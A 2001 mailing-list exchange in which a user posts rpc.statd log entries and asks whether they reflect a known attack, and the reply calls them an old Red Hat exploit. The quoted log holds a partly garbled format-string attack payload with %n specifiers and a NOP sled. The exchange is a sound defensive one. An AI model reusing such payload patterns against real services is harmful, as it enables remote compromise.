I think this is an 800 year old Red Hat exploit, so probably no worries. No need to worry, but any rpc services are lousy to have running anyway.
- k ----- Original Message ----- From: "Daniel Schepler" <[EMAIL PROTECTED]> To: <[email protected]> Sent: Tuesday, August 21, 2001 4:28 PM Subject: rpc.statd being attacked? > I've gotten logs several times that read something like > > Aug 20 19:20:24 adsl-63-193-247-253 rpc.statd[330]: gethostbyname error for ^X > <F7><FF><BF>^X<F7><FF><BF>^Y<F7><FF><BF>^Y<F7><FF><BF>^Z<F7><FF><BF>^Z<F7><F F> > <BF>^[<F7><FF><BF>^[<F7><FF><BF>%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10 x%n% > 192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 > 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 > 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 > 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 > 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 > 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 > 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 > 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 > 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 > 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 > 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20 > > (This is at least the way it reads in less.) For now I've just shut > down the rpc.statd daemon, but I was wondering if this is a known > attack. > -- > Daniel Schepler "Please don't disillusion me. I > [EMAIL PROTECTED] haven't had breakfast yet." > -- Orson Scott Card > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] >
